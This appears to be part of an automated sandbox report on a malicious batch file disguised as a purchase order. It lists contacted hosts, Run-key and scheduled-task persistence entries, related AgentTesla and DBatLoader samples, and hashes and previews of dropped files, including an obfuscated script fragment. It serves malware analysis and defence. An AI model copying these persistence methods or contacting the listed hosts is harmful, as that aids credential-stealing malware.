0000001A.00000002.1609735089.0000000002FA2000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001C.00000000.1577974384.0000000000416000.00000002.00000001.01000000.00000007.sdmpfalse
                                                                                      high
                                                                                      http://ocsp.sectigo.com0Cx.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs
                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        198.252.105.91
                                                                                        gxe0.comCanada
                                                                                        20068HAWKHOSTCAfalse
                                                                                        104.26.13.205
                                                                                        api.ipify.orgUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        51.195.88.199
                                                                                        s82.gocheapweb.comFrance
                                                                                        16276OVHFRfalse
                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1560318
                                                                                        Start date and time:2024-11-21 16:59:11 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 13m 44s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:40
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat
                                                                                        Detection:MAL
                                                                                        Classification:mal100.spre.troj.spyw.evad.winBAT@55/27@3/3
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 66.7%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 98%
                                                                                        • Number of executed functions: 272
                                                                                        • Number of non-executed functions: 57
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .bat
                                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                        • Execution Graph export aborted for target TrojanAIbot.exe, PID 1204 because it is empty
                                                                                        • Execution Graph export aborted for target powershell.exe, PID 5836 because it is empty
                                                                                        • Execution Graph export aborted for target server_BTC.exe, PID 4912 because it is empty
                                                                                        • Execution Graph export aborted for target server_BTC.exe, PID 5868 because it is empty
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        • VT rate limit hit for: RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat
                                                                                        TimeTypeDescription
                                                                                        11:00:09API Interceptor2x Sleep call for process: x.exe modified
                                                                                        11:00:27API Interceptor5549597x Sleep call for process: neworigin.exe modified
                                                                                        11:00:28API Interceptor18x Sleep call for process: powershell.exe modified
                                                                                        11:00:29API Interceptor1853835x Sleep call for process: TrojanAIbot.exe modified
                                                                                        11:00:33API Interceptor2x Sleep call for process: Wisrysxl.PIF modified
                                                                                        17:00:24AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Wisrysxl C:\Users\Public\Wisrysxl.url
                                                                                        17:00:27Task SchedulerRun new task: AccSys path: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                        17:00:32AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Wisrysxl C:\Users\Public\Wisrysxl.url
                                                                                        17:00:41AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        198.252.105.91DHL-INVOICE-MBV.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                        • www.legaldanaa.com/d0ad/?jXu=gWBUvkz7Th1w/4or5wJyBYQATVQKYMhDH/gPz8FNlyuh7t8wp+tSlul7hgK6xuyfJYQ1BxvuzK7AKBkx6IgPVHnLyXh5nXmxBA==&hZ=5jUpdPs
                                                                                        104.26.13.2052b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                                                                                        • api.ipify.org/
                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                        • api.ipify.org/
                                                                                        file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                        • api.ipify.org/
                                                                                        file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                        • api.ipify.org/
                                                                                        file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                        • api.ipify.org/
                                                                                        Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                                                                                        • api.ipify.org/
                                                                                        file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                        • api.ipify.org/
                                                                                        file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                        • api.ipify.org/
                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                        • api.ipify.org/
                                                                                        file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                                                                        • api.ipify.org/
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        s82.gocheapweb.comIBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                        • 51.195.88.199
                                                                                        Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                        • 51.195.88.199
                                                                                        Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                        • 51.195.88.199
                                                                                        Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                        • 51.195.88.199
                                                                                        x.exeGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                        • 51.195.88.199
                                                                                        neworigin.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 51.195.88.199
                                                                                        TC_Ziraat_Bankasi_Hesap_Ekstresi.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                        • 51.195.88.199
                                                                                        Ziraat_Bankasi_Swift_Mesaji_DXB04958T.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                        • 51.195.88.199
                                                                                        New_Order_PO_GM5637H93.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLine, XWormBrowse
                                                                                        • 51.195.88.199
                                                                                        New_Order_PO_GM5637H93.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                        • 51.195.88.199
                                                                                        api.ipify.orgMV BBG MUARA Ship's Particulars.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 104.26.12.205
                                                                                        CHARIKLIA JUNIOR DETAILS.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 104.26.12.205
                                                                                        +11375 Caller left Vc MsG 8b1538917f01661e6746a0528d545dbeac3b40a5- 73945.msgGet hashmaliciousHtmlDropperBrowse
                                                                                        • 104.26.12.205
                                                                                        DATASHEET.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 172.67.74.152
                                                                                        datasheet.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 104.26.13.205
                                                                                        datasheet.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 104.26.13.205
                                                                                        https://www.canva.com/design/DAGXCpgrUrs/iMtluWgvWDmsrSdUOsij5Q/view?utm_content=DAGXCpgrUrs&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                                                        • 104.26.12.205
                                                                                        https://pub-a652f10bc7cf485fb3baac4a6358c931.r2.dev/dreyflex.htmlGet hashmaliciousGabagoolBrowse
                                                                                        • 104.26.12.205
                                                                                        https://url.us.m.mimecastprotect.com/s/cx8GCJ6Aj8C8mZ33UVfXHy0nVz?domain=canva.comGet hashmaliciousUnknownBrowse
                                                                                        • 104.26.12.205
                                                                                        IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                        • 172.67.74.152
                                                                                        s-part-0035.t-0009.t-msedge.nethttps://www.cognitoforms.com/f/fWhXKikFUk-rIZ2zs1gjVw/1Get hashmaliciousUnknownBrowse
                                                                                        • 13.107.246.63
                                                                                        November Billing.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 13.107.246.63
                                                                                        Quote Request.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 13.107.246.63
                                                                                        u.xlsGet hashmaliciousBraodoBrowse
                                                                                        • 13.107.246.63
                                                                                        t.batGet hashmaliciousBraodoBrowse
                                                                                        • 13.107.246.63
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 13.107.246.63
                                                                                        payments.exeGet hashmaliciousFormBookBrowse
                                                                                        • 13.107.246.63
                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                        • 13.107.246.63
                                                                                        S0FTWARE.exeGet hashmaliciousStealc, VidarBrowse
                                                                                        • 13.107.246.63
                                                                                        Rte_PRPay.docxGet hashmaliciousUnknownBrowse
                                                                                        • 13.107.246.63
                                                                                        gxe0.comIBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                        • 198.252.105.91
                                                                                        Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                        • 198.252.105.91
                                                                                        Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                        • 198.252.105.91
                                                                                        Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                        • 198.252.105.91
                                                                                        x.exeGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                        • 198.252.105.91
                                                                                        TC_Ziraat_Bankasi_Hesap_Ekstresi.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                        • 198.252.105.91
                                                                                        Ziraat_Bankasi_Swift_Mesaji_DXB04958T.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                        • 198.252.105.91
                                                                                        NEOMS_EOI_FORM.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                        • 198.252.105.91
                                                                                        NEOMS_EOI_FORM.GZGet hashmaliciousDBatLoaderBrowse
                                                                                        • 198.252.105.91
                                                                                        New_Order_PO_GM5637H93.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                        • 198.252.105.91
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        HAWKHOSTCAIBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                        • 198.252.105.91
                                                                                        MV KODCO.exeGet hashmaliciousFormBookBrowse
                                                                                        • 198.252.98.54
                                                                                        Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                        • 198.252.105.91
                                                                                        Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                        • 198.252.105.91
                                                                                        Arrival Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                        • 198.252.98.54
                                                                                        PROFORMA INVOICE.exeGet hashmaliciousFormBookBrowse
                                                                                        • 198.252.98.54
                                                                                        Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                        • 198.252.105.91
                                                                                        x.exeGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                        • 198.252.105.91
                                                                                        TC_Ziraat_Bankasi_Hesap_Ekstresi.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                        • 198.252.105.91
                                                                                        Ziraat_Bankasi_Swift_Mesaji_DXB04958T.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                        • 198.252.105.91
                                                                                        CLOUDFLARENETUS20bosemkt.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                        • 172.65.251.78
                                                                                        November Billing.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.21.6.54
                                                                                        Quote Request.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.18.95.41
                                                                                        Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                        • 172.67.209.48
                                                                                        injector V2.4.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.219.199
                                                                                        injector V2.5.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.43.198
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.66.38
                                                                                        payments.exeGet hashmaliciousFormBookBrowse
                                                                                        • 172.67.209.48
                                                                                        Mandatory Notice for all December Leave and Vacation application.exeGet hashmaliciousFormBookBrowse
                                                                                        • 104.21.41.74
                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                        • 162.159.61.3
                                                                                        OVHFRhttps://1drv.ms/o/c/1ba8fd2bd98c98a8/EmMMbLWVyqxBh9Z6zxri2ZUBVkwUpSiY2KbvhupkdaFzGA?e=F6pNlDGet hashmaliciousUnknownBrowse
                                                                                        • 54.36.91.62
                                                                                        Kellyb Timesheet Report.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 164.132.95.123
                                                                                        ngPebbPhbp.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                        • 51.75.171.9
                                                                                        https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.comGet hashmaliciousUnknownBrowse
                                                                                        • 213.186.33.5
                                                                                        https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.comGet hashmaliciousUnknownBrowse
                                                                                        • 213.186.33.5
                                                                                        Demande de proposition du Fondation qu#U00e9b#U00e9coise du cancer.pdfGet hashmaliciousUnknownBrowse
                                                                                        • 66.70.227.242
                                                                                        AI_ChainedPackageFile.VistaSoftware.exeGet hashmaliciousPureCrypterBrowse
                                                                                        • 167.114.47.186
                                                                                        AaronGiles(1).exeGet hashmaliciousPureCrypterBrowse
                                                                                        • 167.114.47.186
                                                                                        740d3a.msiGet hashmaliciousUnknownBrowse
                                                                                        • 167.114.47.186
                                                                                        AI_ChainedPackageFile.VistaSoftware.exeGet hashmaliciousPureCrypterBrowse
                                                                                        • 167.114.47.186
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        3b5074b1b5d032e5620f69f9f700ff0e20bosemkt.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                        • 104.26.13.205
                                                                                        OGo8AQxn4k.vbsGet hashmaliciousUnknownBrowse
                                                                                        • 104.26.13.205
                                                                                        3o2WdGwcLF.vbsGet hashmaliciousUnknownBrowse
                                                                                        • 104.26.13.205
                                                                                        https://amstoree.z13.web.core.windows.net/WinhelpSh0A057/index.html?Anph%5C=1-888-734-7204Get hashmaliciousUnknownBrowse
                                                                                        • 104.26.13.205
                                                                                        New PO 796512.exeGet hashmaliciousFormBookBrowse
                                                                                        • 104.26.13.205
                                                                                        Director of Performance Marketing Job Description Roles & Responsibilities Theory 2024.lnkGet hashmaliciousDucktailBrowse
                                                                                        • 104.26.13.205
                                                                                        https://spacardportal.works.com/garGet hashmaliciousUnknownBrowse
                                                                                        • 104.26.13.205
                                                                                        Director of Performance Marketing Job Description Roles & Responsibilities Theory 2024.lnkGet hashmaliciousDucktailBrowse
                                                                                        • 104.26.13.205
                                                                                        order requirements CIF-TRC809945210.exeGet hashmaliciousGuLoaderBrowse
                                                                                        • 104.26.13.205
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.26.13.205
                                                                                        a0e9f5d64349fb13191bc781f81f42e1u.xlsGet hashmaliciousBraodoBrowse
                                                                                        • 198.252.105.91
                                                                                        injector V2.4.exeGet hashmaliciousLummaCBrowse
                                                                                        • 198.252.105.91
                                                                                        injector V2.5.exeGet hashmaliciousLummaCBrowse
                                                                                        • 198.252.105.91
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 198.252.105.91
                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                        • 198.252.105.91
                                                                                        Loader.exeGet hashmaliciousLummaCBrowse
                                                                                        • 198.252.105.91
                                                                                        VMX.exeGet hashmaliciousLummaCBrowse
                                                                                        • 198.252.105.91
                                                                                        ADZ Laucher.exeGet hashmaliciousLummaCBrowse
                                                                                        • 198.252.105.91
                                                                                        Loader.exeGet hashmaliciousLummaCBrowse
                                                                                        • 198.252.105.91
                                                                                        Hexium.exeGet hashmaliciousLummaCBrowse
                                                                                        • 198.252.105.91
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        C:\Users\Public\Libraries\lxsyrsiW.pifIBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                          Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                            Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                              Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                x.exeGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                  TC_Ziraat_Bankasi_Hesap_Ekstresi.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                    Ziraat_Bankasi_Swift_Mesaji_DXB04958T.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                      NEOMS_EOI_FORM.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                                        NEOMS_EOI_FORM.GZGet hashmaliciousDBatLoaderBrowse
                                                                                                          r876789878767.cmdGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                            Process:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1290240
                                                                                                            Entropy (8bit):5.277756240469333
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:mImGUcsvZZdubv7hfl32Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wlb:mxGBcmlGsqjnhMgeiCl7G0nehbGZpbD
                                                                                                            MD5:02C8B645EF58F758FB3A3F22D1596223
                                                                                                            SHA1:623141D516EF872C032659ED89652FECAFD4D3B8
                                                                                                            SHA-256:5F39B17E2A09C53C781288E80690C75A15197148691A01AF3C3EC4B0FB8A9D07
                                                                                                            SHA-512:D2D88A317580361333FC09A1679FF4E334F3A72028124879D825FB98580D6EF5EC35ED25044A44C6B9DA517F2D486891AB61CF03D5538A958E6AD1B092C64323
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@..................................#......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...`.......P...`..............@...........................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):3
                                                                                                            Entropy (8bit):1.584962500721156
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:p:p
                                                                                                            MD5:A5EA0AD9260B1550A14CC58D2C39B03D
                                                                                                            SHA1:F0AEDF295071ED34AB8C6A7692223D22B6A19841
                                                                                                            SHA-256:F1B2F662800122BED0FF255693DF89C4487FBDCF453D3524A42D4EC20C3D9C04
                                                                                                            SHA-512:7C735C613ECE191801114785C1EE26A0485CBF1E8EE2C3B85BA1AD290EF75EEC9FEDE5E1A5DC26D504701F3542E6B6457818F4C1D62448D0DB40D5F35C357D74
                                                                                                            Malicious:false
                                                                                                            Preview:1..
                                                                                                            Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1921890
                                                                                                            Entropy (8bit):7.398856770638502
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:49152:uFLsbSRbR4KUHq/dhv95pz9P8/P/lUtAQXI53D7/vwpU19uyXABAtIFBlZ:ULhRGYHKOBlZ
                                                                                                            MD5:34E82F30B12F324DB1D2604CFA91CBB2
                                                                                                            SHA1:20001D49CD86B776EE8072A07F536B7330A77F97
                                                                                                            SHA-256:F1821B6BA4856A51354BEED61C0F325D39901D70F9FF1792A63758FFEA32FCEF
                                                                                                            SHA-512:47ADC8F19359C4DC9E073C7A464E3F5F0367AC6A06BB6AA741AA06FE8BD762ADB86304415623FB411E69CACC573E66E6397689C47B7291747E057E5BF001C1C1
                                                                                                            Malicious:true
                                                                                                            Preview:...Y#..K..&$..'.#'...%.... %" ...... ..&.....&..$"%.#$'#....'...... '%.%!... .%.''"". "#".%..&.&........%........."!...#'....Y#..K.. .& %.. ...Y#..K.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j.........P.O..."..../....8....\..%.
                                                                                                            Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1392640
                                                                                                            Entropy (8bit):7.401846851033825
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:in5YMTKJPtU65L4oU78G6Hd8b2s17EeL4fFyV2vkSotd/ADgKczxj5z:wzGSkfQJSgK
                                                                                                            MD5:67DAC6AE9EE770115DB85CC71979DC41
                                                                                                            SHA1:A708539EBB312329F56F064A8491E4C6E1BD7CE8
                                                                                                            SHA-256:054899796D592BB5F70B0A9FA28429024A919270A76603626BE24068FAAE59D9
                                                                                                            SHA-512:9FF88C70D4A2F7628A2F853D576B8E7D7EBF3409DE13D56895A06EB2FDC827BEEF45EC982DBC69A9577ED78D27D44F5DF2284CDF614BA4DEBADAF74CD07C204D
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 29%
                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f...........x............@..............................................@...............................'...P...........................r..................................................h...<............................text....Z.......\.................. ..`.itext..L....p.......`.............. ..`.data...............j..............@....bss.....6...@....... ...................idata...'.......(... ..............@....tls....4............H...................rdata...............H..............@..@.reloc...r.......t...J..............@..B.rsrc........P......................@..@.....................@..............@..@................................................................................................
                                                                                                            Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                            File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):62357
                                                                                                            Entropy (8bit):4.705712327109906
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
                                                                                                            MD5:B87F096CBC25570329E2BB59FEE57580
                                                                                                            SHA1:D281D1BF37B4FB46F90973AFC65EECE3908532B2
                                                                                                            SHA-256:D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
                                                                                                            SHA-512:72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
                                                                                                            Malicious:false
                                                                                                            Preview:@echo off..@echo off..@%.......%e%..%c%...%h%.... ...%o%........% %.%o%.....%f%...%f% ........%..s%.%e%.... %t%r.o......% %....%"%.........%l%.......o.%V%......%W%.....o%a%..........%=%.o....%s%. .o%e%. ....... %t%.% %..%"%.r%..%lVWa%"%......%u%. .%p%.%w%.... %u%.... o...%=%..... %=%... . . %"%.%..%lVWa%"%....%R%.%b%. .... %U%. %p%.%z%...%n% ...%n%...%f%..... . ..%W%.......%i%......%%upwu%C%. .. %l%...%o%........%a%......%"% .... %..%lVWa%"% %r%......%M%....%S%...r... ..%o%....... .%w%.....%X%.....rr%I%..... .
                                                                                                            Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):68096
                                                                                                            Entropy (8bit):6.328046551801531
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:lR2rJpByeL+39Ua1ITgA8wpuO5CU4GGMGcT4idU:lR2lg9Ua1egkCU60U
                                                                                                            MD5:C116D3604CEAFE7057D77FF27552C215
                                                                                                            SHA1:452B14432FB5758B46F2897AECCD89F7C82A727D
                                                                                                            SHA-256:7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
                                                                                                            SHA-512:9202A00EEAF4C5BE94DE32FD41BFEA40FC32D368955D49B7BAD2B5C23C4EBC92DCCB37D99F5A14E53AD674B63F1BAA6EFB1FEB27225C86693EAD3262A26D66C6
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                                                            Joe Sandbox View:
                                                                                                            • Filename: IBKB.vbs, Detection: malicious, Browse
                                                                                                            • Filename: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd, Detection: malicious, Browse
                                                                                                            • Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd, Detection: malicious, Browse
                                                                                                            • Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd, Detection: malicious, Browse
                                                                                                            • Filename: x.exe, Detection: malicious, Browse
                                                                                                            • Filename: TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd, Detection: malicious, Browse
                                                                                                            • Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat, Detection: malicious, Browse
                                                                                                            • Filename: NEOMS_EOI_FORM.cmd, Detection: malicious, Browse
                                                                                                            • Filename: NEOMS_EOI_FORM.GZ, Detection: malicious, Browse
                                                                                                            • Filename: r876789878767.cmd, Detection: malicious, Browse
                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....8.......................p....................@.............................................. ...................p.......`...............................................................P.......................................................text............................... ..`.data....p.......0..................@....tls.........@......................@....rdata.......P......................@..P.idata.......`......................@..@.edata.......p......................@..@
                                                                                                            Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                            File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Wisrysxl.PIF">), ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):104
                                                                                                            Entropy (8bit):5.068087618209767
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XM6tZsbxMI0P9ov:HRYFVmTWDyzPtZExMI0PKv
                                                                                                            MD5:FCB9942424DF88C9AB43E79DA670D456
                                                                                                            SHA1:D5A86203AC772BEEEF7822DD239D4EC449DBC2AC
